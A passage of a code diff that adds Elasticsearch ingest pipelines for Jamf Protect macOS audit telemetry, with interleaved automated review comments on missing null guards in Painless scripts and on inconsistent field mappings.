+ ignore_failure: true
+ - rename:
+ field: json.attributes.owner_group_name
+ target_field: user.group.name
+ ignore_missing: true
+ - convert:
+ field: json.attributes.owner_user_id
+ type: string
+ ignore_missing: true
+ ignore_failure: true
+ - append:
+ field: user.id
+ value: '{{{json.attributes.owner_user_id}}}'
+ if: ctx.json?.attributes?.owner_user_id != null
+ allow_duplicates: false
+ ignore_failure: true
+ - append:
+ field: user.name
+ value: '{{{json.attributes.owner_user_name}}}'
+ if: ctx.json?.attributes?.owner_user_name != null
+ allow_duplicates: false
+ ignore_failure: true
+ - append:
+ field: related.user
+ value: '{{{json.attributes.owner_user_name}}}'
+ if: ctx.json?.attributes?.owner_user_name != null
+ allow_duplicates: false
+ ignore_failure: true
+ - pipeline:
+ name: '{{ IngestPipeline "pipeline_identity_object" }}'
+ - rename:
+ field: json.path
+ target_field: jamf_protect.telemetry.path
+ ignore_missing: true
+ - script:
+ description: Convert Decimal into Octal.
+ lang: painless
+ source: |
+ int temp = (int)ctx.json?.file_access_mode;
+ ctx.jamf_protect.telemetry.attributes.file.access_mode = Integer.toOctalString(temp);
diff --git a/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_chroot.yml b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_chroot.yml
new file mode 100644
index 00000000000..d695d2efe4a
--- /dev/null
+++ b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_chroot.yml
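Review bot: The `Convert Decimal into Octal` script has no `if:` condition, so when `json.file_access_mode` is absent (the rename that produces it tolerates a missing source via `ignore_failure: true`) the cast in `int temp = (int)ctx.json?.file_access_mode;` is applied to null and the script fails the whole document instead of just leaving the field unset. Add `if: ctx.json?.file_access_mode != null` to the script processor; pipeline_aue_chroot.yml, pipeline_aue_execve.yml, pipeline_aue_mount.yml and pipeline_aue_unmount.yml repeat this script verbatim and need the same guard. The assignment also assumes `jamf_protect.telemetry.attributes.file` already exists, which in this pipeline is only true when `json.attributes.file_system_id` was present, so either extend the condition with `&& ctx.jamf_protect?.telemetry?.attributes?.file != null` or create the map inside the script. Separately, the `file_access_mode` rename uses `ignore_failure: true` here while the sibling pipelines use `ignore_missing: true`; aligning on `ignore_missing` keeps unrelated rename failures visible.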
@@ -0,0 +1,72 @@
+---
+description: Pipeline for Jamf Protect Telemetry aue_chroot audit logs.
+processors:
+ - convert:
+ field: json.attributes.device
+ target_field: jamf_protect.telemetry.attributes.device
+ type: string
+ ignore_missing: true
+ ignore_failure: true
+ - rename:
+ field: json.attributes.file_access_mode
+ target_field: json.file_access_mode
+ ignore_missing: true
+ - convert:
+ field: json.attributes.file_system_id
+ target_field: jamf_protect.telemetry.attributes.file.system.id
+ type: string
+ ignore_missing: true
+ ignore_failure: true
+ - convert:
+ field: json.attributes.node_id
+ target_field: jamf_protect.telemetry.attributes.node.id
+ type: string
+ ignore_missing: true
+ ignore_failure: true
+ - convert:
+ field: json.attributes.owner_group_id
+ target_field: user.group.id
+ type: string
+ ignore_missing: true
+ ignore_failure: true
+ - rename:
+ field: json.attributes.owner_group_name
+ target_field: user.group.name
+ ignore_missing: true
+ - convert:
+ field: json.attributes.owner_user_id
+ type: string
+ ignore_missing: true
+ ignore_failure: true
+ - append:
+ field: user.id
+ value: '{{{json.attributes.owner_user_id}}}'
+ if: ctx.json?.attributes?.owner_user_id != null
+ allow_duplicates: false
+ ignore_failure: true
+ - append:
+ field: user.name
+ value: '{{{json.attributes.owner_user_name}}}'
+ if: ctx.json?.attributes?.owner_user_name != null
+ allow_duplicates: false
+ ignore_failure: true
+ - append:
+ field: related.user
+ value: '{{{json.attributes.owner_user_name}}}'
+ if: ctx.json?.attributes?.owner_user_name != null
+ allow_duplicates: false
+ ignore_failure: true
+ - pipeline:
+ name: '{{ IngestPipeline "pipeline_identity_object" }}'
+ - rename:
+ field: json.path
+ target_field: jamf_protect.telemetry.path
+ ignore_missing: true
+ - pipeline:
+ name: '{{ IngestPipeline "pipeline_exec_chain_child_object" }}'
+ - script:
+ description: Convert Decimal into Octal.
+ lang: painless
+ source: |
+ int temp = (int)ctx.json?.file_access_mode;
+ ctx.jamf_protect.telemetry.attributes.file.access_mode = Integer.toOctalString(temp);
diff --git a/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_execve.yml b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_execve.yml
new file mode 100644
index 00000000000..663893d62a3
--- /dev/null
+++ b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_execve.yml
@@ -0,0 +1,141 @@
+---
+description: Pipeline for Jamf Protect Telemetry aue_execve audit logs.
+processors:
+ - convert:
+ field: json.attributes.device
+ target_field: jamf_protect.telemetry.attributes.device
+ type: string
+ ignore_missing: true
+ ignore_failure: true
+ - rename:
+ field: json.attributes.file_access_mode
+ target_field: json.file_access_mode
+ ignore_failure: true
+ - convert:
+ field: json.attributes.file_system_id
+ target_field: jamf_protect.telemetry.attributes.file.system.id
+ type: string
+ ignore_missing: true
+ ignore_failure: true
+ - convert:
+ field: json.attributes.node_id
+ target_field: jamf_protect.telemetry.attributes.node.id
+ type: string
+ ignore_missing: true
+ ignore_failure: true
+ - convert:
+ field: json.attributes.owner_group_id
+ target_field: user.group.id
+ type: string
+ ignore_missing: true
+ ignore_failure: true
+ - rename:
+ field: json.attributes.owner_group_name
+ target_field: user.group.name
+ ignore_missing: true
+ - convert:
+ field: json.attributes.owner_user_id
+ type: string
+ ignore_missing: true
+ ignore_failure: true
+ - append:
+ field: user.id
+ value: '{{{json.attributes.owner_user_id}}}'
+ if: ctx.json?.attributes?.owner_user_id != null
+ allow_duplicates: false
+ ignore_failure: true
+ - append:
+ field: user.name
+ value: '{{{json.attributes.owner_user_name}}}'
+ if: ctx.json?.attributes?.owner_user_name != null
+ allow_duplicates: false
+ ignore_failure: true
+ - append:
+ field: related.user
+ value: '{{{json.attributes.owner_user_name}}}'
+ if: ctx.json?.attributes?.owner_user_name != null
+ allow_duplicates: false
+ ignore_failure: true
+ - pipeline:
+ name: '{{ IngestPipeline "pipeline_identity_object" }}'
+ - rename:
+ field: json.path
+ target_field: jamf_protect.telemetry.path
+ ignore_missing: true
+ - pipeline:
+ name: '{{ IngestPipeline "pipeline_exec_chain_child_object" }}'
+ - rename:
+ field: json.exec_args.args
+ target_field: json.args
+ ignore_missing: true
+ - rename:
+ field: json.exec_args.args_compiled
+ target_field: jamf_protect.telemetry.exec_args.args_compiled
+ ignore_missing: true
+ - script:
+ lang: painless
+ if: ctx.json?.exec_env?.env?.ARCH != null && ctx.json.exec_env.env.ARCH != ''
+ params:
+ 'allowed':
+ - linux
+ - macos
+ - unix
+ - windows
+ - ios
+ - android
+ 'replacements':
+ 'macintosh': macos
+ source: |
+ for (entry in params.replacements.entrySet()) {
+ if (ctx.json.exec_env.env.ARCH == entry.getKey()) {
+ ctx.json.exec_env.env.put('ARCH', entry.getValue());
+ }
+ }
+ if (!params.allowed.contains(ctx.json.exec_env.env.ARCH)) {
+ return;
+ }
+ if (ctx.host == null) {
+ HashMap hm = new HashMap();
+ ctx.put('host', hm);
+ }
+ if (ctx.host.os == null) {
+ HashMap hm = new HashMap();
+ ctx.host.put('os', hm);
+ }
+ ctx.host.os.put('type', ctx.json.exec_env.env.ARCH);
+ ctx.json.exec_env.env.remove('ARCH');
+ - rename:
+ field: json.exec_env.env.CPU
+ target_field: host.architecture
+ ignore_missing: true
+ - rename:
+ field: json.exec_env.env.PATH
+ target_field: jamf_protect.telemetry.exec_env.env.path
+ ignore_missing: true
+ - rename:
+ field: json.exec_env.env.XPC_FLAGS
+ target_field: jamf_protect.telemetry.exec_env.env.xpc.flags
+ ignore_missing: true
+ - rename:
+ field: json.exec_env.env.XPC_SERVICE_NAME
+ target_field: jamf_protect.telemetry.exec_env.env.xpc.service_name
+ ignore_missing: true
+ - rename:
+ field: json.exec_env.env_compiled
+ target_field: jamf_protect.telemetry.exec_env.env.compiled
+ ignore_missing: true
+ - script:
+ description: Convert Object into Array.
+ lang: painless
+ source: |
+ def args_list = new ArrayList();
+ ctx.process.args = args_list;
+ for (Map.Entry m : ctx.json?.args.entrySet()) {
+ ctx.process?.args.add(m.getValue());
+ }
+ - script:
+ description: Convert Decimal into Octal.
+ lang: painless
+ source: |
+ int temp = (int)ctx.json?.file_access_mode;
+ ctx.jamf_protect.telemetry.attributes.file.access_mode = Integer.toOctalString(temp);
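Review bot: The `Convert Object into Array` script is unguarded: `ctx.process.args = args_list;` dereferences `ctx.process`, which this pipeline creates only indirectly (for instance the `process.parent.pid` convert in pipeline_exec_chain_child_object when that field is present), and `ctx.json?.args.entrySet()` null-safes `json` but not `args`, so a document whose `json.exec_args.args` was absent (the rename is `ignore_missing: true`) fails outright. Add `if: ctx.json?.args != null` to the script and create the map when needed, e.g. `if (ctx.process == null) { ctx.put('process', new HashMap()); }`, mirroring how the ARCH script above guards `host`; pipeline_aue_posix_spawn.yml repeats the same script and needs the same change. The `?.` in `ctx.process?.args.add(...)` is misleading once the line above has already assumed `process` is non-null, and the resulting order of `process.args` depends on the iteration order of the `args` object, which is worth pinning with a test fixture since argument order matters for detection content.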
diff --git a/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_exit.yml b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_exit.yml
new file mode 100644
index 00000000000..e16105fcf36
--- /dev/null
+++ b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_exit.yml
@@ -0,0 +1,22 @@
+---
+description: Pipeline for Jamf Protect Telemetry aue_exit audit logs.
+processors:
+ - pipeline:
+ name: '{{ IngestPipeline "pipeline_identity_object" }}'
+ - pipeline:
+ name: '{{ IngestPipeline "pipeline_exec_chain_child_object" }}'
+ - convert:
+ field: json.exit.return_value
+ target_field: jamf_protect.telemetry.exit.return.value
+ type: long
+ ignore_missing: true
+ on_failure:
+ - append:
+ field: error.message
+ value: '{{{_ingest.on_failure_message}}}'
+ - convert:
+ field: json.exit.status
+ target_field: jamf_protect.telemetry.exit.status
+ type: string
+ ignore_missing: true
+ ignore_failure: true
diff --git a/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_fork.yml b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_fork.yml
new file mode 100644
index 00000000000..4bd0633dca5
--- /dev/null
+++ b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_fork.yml
@@ -0,0 +1,18 @@
+---
+description: Pipeline for Jamf Protect Telemetry aue_fork audit logs.
+processors:
+ - rename:
+ field: json.exec_chain_parent.uuid
+ target_field: jamf_protect.telemetry.exec_chain_parent.uuid
+ ignore_missing: true
+ - convert:
+ field: json.arguments.child_PID
+ target_field: jamf_protect.telemetry.arguments.child.pid
+ type: long
+ ignore_missing: true
+ on_failure:
+ - append:
+ field: error.message
+ value: '{{{_ingest.on_failure_message}}}'
+ - pipeline:
+ name: '{{ IngestPipeline "pipeline_identity_object" }}'
diff --git a/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_kill.yml b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_kill.yml
new file mode 100644
index 00000000000..903b5f46a35
--- /dev/null
+++ b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_kill.yml
@@ -0,0 +1,13 @@
+---
+description: Pipeline for Jamf Protect Telemetry aue_kill audit logs.
+processors:
+ - convert:
+ field: json.arguments.signal
+ target_field: jamf_protect.telemetry.arguments.signal
+ type: string
+ ignore_missing: true
+ ignore_failure: true
+ - pipeline:
+ name: '{{ IngestPipeline "pipeline_process_object" }}'
+ - pipeline:
+ name: '{{ IngestPipeline "pipeline_identity_object" }}'
diff --git a/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_listen.yml b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_listen.yml
new file mode 100644
index 00000000000..0d855e3fe9e
--- /dev/null
+++ b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_listen.yml
@@ -0,0 +1,13 @@
+---
+description: Pipeline for Jamf Protect Telemetry aue_listen audit logs.
+processors:
+ - convert:
+ field: json.arguments.fd
+ target_field: jamf_protect.telemetry.arguments.fd
+ type: string
+ ignore_missing: true
+ ignore_failure: true
+ - pipeline:
+ name: '{{ IngestPipeline "pipeline_exec_chain_child_object" }}'
+ - pipeline:
+ name: '{{ IngestPipeline "pipeline_identity_object" }}'
diff --git a/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_logout.yml b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_logout.yml
new file mode 100644
index 00000000000..9e83063d193
--- /dev/null
+++ b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_logout.yml
@@ -0,0 +1,7 @@
+---
+description: Pipeline for Jamf Protect Telemetry aue_logout audit logs.
+processors:
+ - pipeline:
+ name: '{{ IngestPipeline "pipeline_exec_chain_child_object" }}'
+ - pipeline:
+ name: '{{ IngestPipeline "pipeline_identity_object" }}'
diff --git a/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_mount.yml b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_mount.yml
new file mode 100644
index 00000000000..9fa589eca1e
--- /dev/null
+++ b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_mount.yml
@@ -0,0 +1,82 @@
+---
+description: Pipeline for Jamf Protect Telemetry aue_mount audit logs.
+processors:
+ - rename:
+ field: json.texts
+ target_field: jamf_protect.telemetry.texts
+ ignore_missing: true
+ - pipeline:
+ name: '{{ IngestPipeline "pipeline_exec_chain_child_object" }}'
+ - pipeline:
+ name: '{{ IngestPipeline "pipeline_identity_object" }}'
+ - rename:
+ field: json.path
+ target_field: jamf_protect.telemetry.path
+ ignore_missing: true
+ - convert:
+ field: json.attributes.device
+ target_field: jamf_protect.telemetry.attributes.device
+ type: string
+ ignore_missing: true
+ ignore_failure: true
+ - rename:
+ field: json.attributes.file_access_mode
+ target_field: json.file_access_mode
+ ignore_missing: true
+ - convert:
+ field: json.attributes.file_system_id
+ target_field: jamf_protect.telemetry.attributes.file.system.id
+ type: string
+ ignore_missing: true
+ ignore_failure: true
+ - convert:
+ field: json.attributes.node_id
+ target_field: jamf_protect.telemetry.attributes.node.id
+ type: string
+ ignore_missing: true
+ ignore_failure: true
+ - convert:
+ field: json.attributes.owner_group_id
+ target_field: jamf_protect.telemetry.attributes.owner.group.id
+ type: string
+ ignore_missing: true
+ ignore_failure: true
+ - rename:
+ field: json.attributes.owner_group_name
+ target_field: jamf_protect.telemetry.attributes.owner.group.name
+ ignore_missing: true
+ - convert:
+ field: json.attributes.owner_user_id
+ type: string
+ ignore_missing: true
+ ignore_failure: true
+ - append:
+ field: user.id
+ value: '{{{json.attributes.owner_user_id}}}'
+ if: ctx.json?.attributes?.owner_user_id != null
+ allow_duplicates: false
+ ignore_failure: true
+ - append:
+ field: user.name
+ value: '{{{json.attributes.owner_user_name}}}'
+ if: ctx.json?.attributes?.owner_user_name != null
+ allow_duplicates: false
+ ignore_failure: true
+ - append:
+ field: related.user
+ value: '{{{json.attributes.owner_user_name}}}'
+ if: ctx.json?.attributes?.owner_user_name != null
+ allow_duplicates: false
+ ignore_failure: true
+ - convert:
+ field: json.arguments.flags
+ target_field: jamf_protect.telemetry.arguments.flags
+ type: string
+ ignore_missing: true
+ ignore_failure: true
+ - script:
+ description: Convert Decimal into Octal.
+ lang: painless
+ source: |
+ int temp = (int)ctx.json?.file_access_mode;
+ ctx.jamf_protect.telemetry.attributes.file.access_mode = Integer.toOctalString(temp);
diff --git a/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_pidfortask.yml b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_pidfortask.yml
new file mode 100644
index 00000000000..f9628191285
--- /dev/null
+++ b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_pidfortask.yml
@@ -0,0 +1,21 @@
+---
+description: Pipeline for Jamf Protect Telemetry aue_pidfortask audit logs.
+processors:
+ - convert:
+ field: json.arguments.pid
+ target_field: jamf_protect.telemetry.arguments.pid
+ type: long
+ ignore_missing: true
+ on_failure:
+ - append:
+ field: error.message
+ value: '{{{_ingest.on_failure_message}}}'
+ - convert:
+ field: json.arguments.port
+ target_field: jamf_protect.telemetry.arguments.port
+ type: long
+ ignore_missing: true
+ on_failure:
+ - append:
+ field: error.message
+ value: '{{{_ingest.on_failure_message}}}'
diff --git a/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_posix_spawn.yml b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_posix_spawn.yml
new file mode 100644
index 00000000000..1344c6fdb55
--- /dev/null
+++ b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_posix_spawn.yml
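Review bot: `json.attributes.owner_group_id` and `owner_group_name` are mapped here to `jamf_protect.telemetry.attributes.owner.group.id`/`.name`, whereas pipeline_aue_chdir.yml, pipeline_aue_chroot.yml and pipeline_aue_execve.yml send the same source fields to ECS `user.group.id`/`user.group.name` (pipeline_aue_unmount.yml matches this hunk); the five pipelines should agree on one target. Because these attributes describe the owner of the file object rather than the user performing the action, the vendor-namespaced target used here looks like the safer choice, and by the same reasoning the `user.id`/`user.name` appends of `owner_user_id`/`owner_user_name` in all five pipelines risk conflating the file owner with the acting subject that pipeline_identity_object presumably sets — worth confirming against the test fixtures, and documenting the decision in the `description:`. The octal script at the end of this hunk carries the missing-field guard issue noted on pipeline_aue_chdir.yml.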
@@ -0,0 +1,47 @@
+---
+description: Pipeline for Jamf Protect Telemetry aue_posix_spawn audit logs.
+processors:
+ - convert:
+ field: json.arguments.child_PID
+ target_field: jamf_protect.telemetry.arguments.child.pid
+ type: long
+ ignore_missing: true
+ on_failure:
+ - append:
+ field: error.message
+ value: '{{{_ingest.on_failure_message}}}'
+ - rename:
+ field: json.exec_args.args
+ target_field: json.args
+ ignore_missing: true
+ - rename:
+ field: json.exec_args.args_compiled
+ target_field: jamf_protect.telemetry.exec_args.args_compiled
+ ignore_missing: true
+ - rename:
+ field: json.exec_env.env.XPC_FLAGS
+ target_field: jamf_protect.telemetry.exec_env.env.xpc.flags
+ ignore_missing: true
+ - rename:
+ field: json.exec_env.env_compiled
+ target_field: jamf_protect.telemetry.exec_env.env.compiled
+ ignore_missing: true
+ - rename:
+ field: json.path
+ target_field: jamf_protect.telemetry.path
+ ignore_missing: true
+ - rename:
+ field: json.exec_chain_parent.uuid
+ target_field: jamf_protect.telemetry.exec_chain_parent.uuid
+ ignore_missing: true
+ - script:
+ description: Convert Object into Array.
+ lang: painless
+ source: |
+ def args_list = new ArrayList();
+ ctx.process.args = args_list;
+ for (Map.Entry m : ctx.json?.args.entrySet()) {
+ ctx.process?.args.add(m.getValue());
+ }
+ - pipeline:
+ name: '{{ IngestPipeline "pipeline_identity_object" }}'
diff --git a/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_remove_from_group_and_aue_mac_set_proc.yml b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_remove_from_group_and_aue_mac_set_proc.yml
new file mode 100644
index 00000000000..95aaec8433a
--- /dev/null
+++ b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_remove_from_group_and_aue_mac_set_proc.yml
@@ -0,0 +1,11 @@
+---
+description: Pipeline for Jamf Protect Telemetry aue_remove_from_group and aue_mac_set_proc audit logs.
+processors:
+ - rename:
+ field: json.texts
+ target_field: jamf_protect.telemetry.texts
+ ignore_missing: true
+ - pipeline:
+ name: '{{ IngestPipeline "pipeline_exec_chain_child_object" }}'
+ - pipeline:
+ name: '{{ IngestPipeline "pipeline_identity_object" }}'
diff --git a/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_session.yml b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_session.yml
new file mode 100644
index 00000000000..70737f672e3
--- /dev/null
+++ b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_session.yml
@@ -0,0 +1,21 @@
+---
+description: Pipeline for Jamf Protect Telemetry aue_session_start, aue_session_end, aue_session_update and aue_session_close audit logs.
+processors:
+ - convert:
+ field: json.arguments.am_failure
+ target_field: jamf_protect.telemetry.arguments.am_failure
+ type: string
+ ignore_missing: true
+ ignore_failure: true
+ - convert:
+ field: json.arguments.am_success
+ target_field: jamf_protect.telemetry.arguments.am_success
+ type: string
+ ignore_missing: true
+ ignore_failure: true
+ - convert:
+ field: json.arguments.sflags
+ target_field: jamf_protect.telemetry.arguments.sflags
+ type: string
+ ignore_missing: true
+ ignore_failure: true
diff --git a/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_setpriority.yml b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_setpriority.yml
new file mode 100644
index 00000000000..1eed014df7d
--- /dev/null
+++ b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_setpriority.yml
@@ -0,0 +1,26 @@
+---
+description: Pipeline for Jamf Protect Telemetry aue_setpriority audit logs.
+processors:
+ - pipeline:
+ name: '{{ IngestPipeline "pipeline_identity_object" }}'
+ - convert:
+ field: json.arguments.priority
+ target_field: jamf_protect.telemetry.arguments.priority
+ type: long
+ ignore_missing: true
+ on_failure:
+ - append:
+ field: error.message
+ value: '{{{_ingest.on_failure_message}}}'
+ - convert:
+ field: json.arguments.which
+ target_field: jamf_protect.telemetry.arguments.which
+ type: string
+ ignore_missing: true
+ ignore_failure: true
+ - convert:
+ field: json.arguments.who
+ target_field: jamf_protect.telemetry.arguments.who
+ type: string
+ ignore_missing: true
+ ignore_failure: true
diff --git a/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_socketpair.yml b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_socketpair.yml
new file mode 100644
index 00000000000..8b560e1def8
--- /dev/null
+++ b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_socketpair.yml
@@ -0,0 +1,23 @@
+---
+description: Pipeline for Jamf Protect Telemetry aue_socketpair audit logs.
+processors:
+ - pipeline:
+ name: '{{ IngestPipeline "pipeline_identity_object" }}'
+ - convert:
+ field: json.arguments.domain
+ target_field: jamf_protect.telemetry.arguments.domain
+ type: string
+ ignore_missing: true
+ ignore_failure: true
+ - convert:
+ field: json.arguments.protocol
+ target_field: jamf_protect.telemetry.arguments.protocol
+ type: string
+ ignore_missing: true
+ ignore_failure: true
+ - convert:
+ field: json.arguments.type
+ target_field: jamf_protect.telemetry.arguments.type
+ type: string
+ ignore_missing: true
+ ignore_failure: true
diff --git a/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_ssauthint.yml b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_ssauthint.yml
new file mode 100644
index 00000000000..4c2ffa716da
--- /dev/null
+++ b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_ssauthint.yml
@@ -0,0 +1,19 @@
+---
+description: Pipeline for Jamf Protect Telemetry aue_ssauthint audit logs.
+processors:
+ - pipeline:
+ name: '{{ IngestPipeline "pipeline_identity_object" }}'
+ - rename:
+ field: json.texts
+ target_field: jamf_protect.telemetry.texts
+ ignore_missing: true
+ - convert:
+ field: json.arguments.known_UID_
+ target_field: jamf_protect.telemetry.arguments.known_uid
+ type: string
+ ignore_missing: true
+ ignore_failure: true
+ - rename:
+ field: json.arguments
+ target_field: jamf_protect.telemetry.arguments.flattened
+ ignore_missing: true
diff --git a/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_taskforpid.yml b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_taskforpid.yml
new file mode 100644
index 00000000000..636b41e7c7f
--- /dev/null
+++ b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_taskforpid.yml
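Review bot: The `convert` of `json.arguments.known_UID_` leaves the source field in place, and the `rename` that follows moves the whole `json.arguments` object to `jamf_protect.telemetry.arguments.flattened`, so the same value is stored twice, as `arguments.known_uid` and as `arguments.flattened.known_UID_`. Either insert `- remove:` / `field: json.arguments.known_UID_` / `ignore_missing: true` between the two processors, or drop the convert and let the flattened object carry the value. If `flattened` is mapped with the `flattened` field type the duplicate is merely wasteful, but that mapping is not visible in this hunk, so please confirm.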
@@ -0,0 +1,23 @@
+---
+description: Pipeline for Jamf Protect Telemetry aue_taskforpid audit logs.
+processors:
+ - convert:
+ field: json.arguments.target_port
+ target_field: jamf_protect.telemetry.arguments.target.port
+ type: long
+ ignore_missing: true
+ on_failure:
+ - append:
+ field: error.message
+ value: '{{{_ingest.on_failure_message}}}'
+ - convert:
+ field: json.arguments.task_port
+ target_field: jamf_protect.telemetry.arguments.task.port
+ type: long
+ ignore_missing: true
+ on_failure:
+ - append:
+ field: error.message
+ value: '{{{_ingest.on_failure_message}}}'
+ - pipeline:
+ name: '{{ IngestPipeline "pipeline_process_object" }}'
diff --git a/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_tasknameforpid.yml b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_tasknameforpid.yml
new file mode 100644
index 00000000000..20a0756e242
--- /dev/null
+++ b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_tasknameforpid.yml
@@ -0,0 +1,27 @@
+---
+description: Pipeline for Jamf Protect Telemetry aue_tasknameforpid audit logs.
+processors:
+ - convert:
+ field: json.arguments.process
+ target_field: jamf_protect.telemetry.arguments.process
+ type: string
+ ignore_missing: true
+ ignore_failure: true
+ - convert:
+ field: json.arguments.target_port
+ target_field: jamf_protect.telemetry.arguments.target.port
+ type: long
+ ignore_missing: true
+ on_failure:
+ - append:
+ field: error.message
+ value: '{{{_ingest.on_failure_message}}}'
+ - convert:
+ field: json.arguments.task_port
+ target_field: jamf_protect.telemetry.arguments.task.port
+ type: long
+ ignore_missing: true
+ on_failure:
+ - append:
+ field: error.message
+ value: '{{{_ingest.on_failure_message}}}'
diff --git a/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_unmount.yml b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_unmount.yml
new file mode 100644
index 00000000000..e0b03bf2c0c
--- /dev/null
+++ b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_unmount.yml
@@ -0,0 +1,72 @@
+---
+description: Pipeline for Jamf Protect Telemetry aue_unmount audit logs.
+processors:
+ - pipeline:
+ name: '{{ IngestPipeline "pipeline_identity_object" }}'
+ - pipeline:
+ name: '{{ IngestPipeline "pipeline_exec_chain_child_object" }}'
+ - rename:
+ field: json.path
+ target_field: jamf_protect.telemetry.path
+ ignore_missing: true
+ - convert:
+ field: json.attributes.device
+ target_field: jamf_protect.telemetry.attributes.device
+ type: string
+ ignore_missing: true
+ ignore_failure: true
+ - rename:
+ field: json.attributes.file_access_mode
+ target_field: json.file_access_mode
+ ignore_missing: true
+ - convert:
+ field: json.attributes.file_system_id
+ target_field: jamf_protect.telemetry.attributes.file.system.id
+ type: string
+ ignore_missing: true
+ ignore_failure: true
+ - convert:
+ field: json.attributes.node_id
+ target_field: jamf_protect.telemetry.attributes.node.id
+ type: string
+ ignore_missing: true
+ ignore_failure: true
+ - convert:
+ field: json.attributes.owner_group_id
+ target_field: jamf_protect.telemetry.attributes.owner.group.id
+ type: string
+ ignore_missing: true
+ ignore_failure: true
+ - rename:
+ field: json.attributes.owner_group_name
+ target_field: jamf_protect.telemetry.attributes.owner.group.name
+ ignore_missing: true
+ - convert:
+ field: json.attributes.owner_user_id
+ type: string
+ ignore_missing: true
+ ignore_failure: true
+ - append:
+ field: user.id
+ value: '{{{json.attributes.owner_user_id}}}'
+ if: ctx.json?.attributes?.owner_user_id != null
+ allow_duplicates: false
+ ignore_failure: true
+ - append:
+ field: user.name
+ value: '{{{json.attributes.owner_user_name}}}'
+ if: ctx.json?.attributes?.owner_user_name != null
+ allow_duplicates: false
+ ignore_failure: true
+ - append:
+ field: related.user
+ value: '{{{json.attributes.owner_user_name}}}'
+ if: ctx.json?.attributes?.owner_user_name != null
+ allow_duplicates: false
+ ignore_failure: true
+ - script:
+ description: Convert Decimal into Octal.
+ lang: painless
+ source: |
+ int temp = (int)ctx.json?.file_access_mode;
+ ctx.jamf_protect.telemetry.attributes.file.access_mode = Integer.toOctalString(temp);
diff --git a/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_event.yml b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_event.yml
new file mode 100644
index 00000000000..a987e75035e
